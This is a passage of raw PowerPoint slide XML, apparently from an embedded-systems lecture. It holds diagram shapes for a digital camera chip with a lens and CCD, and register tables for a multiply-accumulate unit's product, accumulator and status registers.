              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11502"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68" name="Freeform 54"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11499"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2" name="Group 55"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2730" y="3464"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="7417" y="9349"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29763" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7496" y="9493"/>
                  <a:ext cx="1" cy="34"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29764" name="Freeform 57"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7419" y="9349"/>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65" name="Freeform 58"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7417" y="9522"/>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w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="13" name="Group 59"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3870" y="3138"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="8667" y="9023"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29760" name="Line 60"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8746" y="9168"/>
                  <a:ext cx="1" cy="36"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29761" name="Freeform 61"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8670"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62" name="Freeform 62"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8667"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4" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5984" y="3138"/>
                <a:ext cx="158" cy="326"/>
                <a:chOff x="11331" y="9023"/>
                <a:chExt cx="158" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29757" name="Line 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11410" y="9168"/>
                  <a:ext cx="1" cy="36"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29758" name="Freeform 65"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11334"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59" name="Freeform 66"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11331"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5" name="Group 67"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7542" y="3138"/>
                <a:ext cx="156" cy="326"/>
                <a:chOff x="12999" y="9023"/>
                <a:chExt cx="156" cy="326"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29755" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipV="1">
                  <a:off x="13076" y="9168"/>
                  <a:ext cx="1" cy="181"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29756" name="Freeform 69"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12999" y="9023"/>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w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="16" name="Group 70"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7225" y="3464"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="12332" y="9349"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29752" name="Line 71"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12411" y="9493"/>
                  <a:ext cx="1" cy="34"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29753" name="Freeform 72"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12335"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54" name="Freeform 73"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="12332"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7" name="Group 74"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4978" y="3464"/>
                <a:ext cx="158" cy="323"/>
                <a:chOff x="9915" y="9349"/>
                <a:chExt cx="158" cy="323"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29749" name="Line 75"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9994" y="9493"/>
                  <a:ext cx="1" cy="34"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29750" name="Freeform 76"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9918"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51" name="Freeform 77"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9915"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sp>
            <p:nvSpPr>
              <p:cNvPr id="29734" name="Rectangle 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2170" y="2252"/>
                <a:ext cx="1699" cy="213"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Digital camera chip</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29735" name="Oval 79"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="2672"/>
                <a:ext cx="144" cy="720"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29736" name="Rectangle 80"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1617" y="2691"/>
                <a:ext cx="144" cy="720"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29737" name="Rectangle 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="3392"/>
                <a:ext cx="420" cy="241"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1800" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>lens</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29738" name="Rectangle 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1463" y="2461"/>
                <a:ext cx="451" cy="213"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="1">
                    <a:latin typeface="Helvetica" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>CCD </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29739" name="Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2710" y="3050"/>
                <a:ext cx="350" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 350"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 350 w 350"/>
                  <a:gd name="T3" fmla="*/ 1 h 1"/>
                  <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T6" fmla="*/ 0 w 350"/>
                  <a:gd name="T7" fmla="*/ 0 h 1"/>
                  <a:gd name="T8" fmla="*/ 350 w 350"/>
                  <a:gd name="T9" fmla="*/ 1 h 1"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T4">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T5">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T6" t="T7" r="T8" b="T9"/>
                <a:pathLst>
                  <a:path w="350" h="1">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="350" y="1"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29740" name="Line 84"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1770" y="3110"/>
                <a:ext cx="360" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29741" name="Line 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1390" y="3120"/>
                <a:ext cx="230" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29742" name="Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7910" y="295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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29743" name="Line 87"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="1760" y="2820"/>
                <a:ext cx="1300" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29744" name="Line 88"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5055" y="4185"/>
                <a:ext cx="0" cy="990"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd type="triangle" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29745" name="Line 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2809" y="4986"/>
                <a:ext cx="1" cy="33"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29746" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2732" y="4841"/>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47" name="Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2730" y="5015"/>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w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29748" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7910" y="567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p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:gr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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MAC reg 3: product</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="75799" name="Group 23"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957175296"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2286000"/>
          <a:ext cx="8229600" cy="2792857"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="75071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4169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63:0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0x0000000000000000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Multiplier Product (MACPROD):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Result of the multiplication of MACMLTR and MACMLTD.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Updated one clock after a write to MACMLTD.</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578519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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>MAC reg 4: accumulator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="76828" name="Group 28"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2706698182"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2286000"/>
          <a:ext cx="8229600" cy="2987675"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1676400"/>
                <a:gridCol w="4724400"/>
              </a:tblGrid>
              <a:tr h="70118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4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95:0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RW/L</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0x000000000000000000000000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Accumulator Result (MACRES):</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Two clocks after a write to MACMLTD this register is updated with the previous value of this register PLUS the result of the unsigned multiplication of MACMLTR and MACMLTD.</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954423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smtClean="0"/>
              <a:t>MAC reg 5: status</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="77890" name="Group 66"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1667607686"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1600200"/>
          <a:ext cx="8229600" cy="5108575"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="762000"/>
                <a:gridCol w="1066800"/>
                <a:gridCol w="1219200"/>
                <a:gridCol w="5181600"/>
              </a:tblGrid>
              <a:tr h="750981">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Default Value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31:2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RO</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cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>0x00000000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Reserved (RSVD)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t> </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7985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WO/L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Clear (MACCLR):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Writing a '1' to this bit clears the result field (MACRES). This bit is self-cleared by hardware upon completion of the MACRES clear, which is essentially immediate.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8144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RO</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Valid (MACVLD):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This bit is set to '1' to indicate when valid results are available in MACRES field. It is set to ‘0’ for one clock after the multiplicand is written, then will be set to a '1' when the result becomes valid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05956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06463" y="1981200"/>
          <a:ext cx="7327900" cy="4114800"/>
        </p:xfrm>
        <a:graphic>
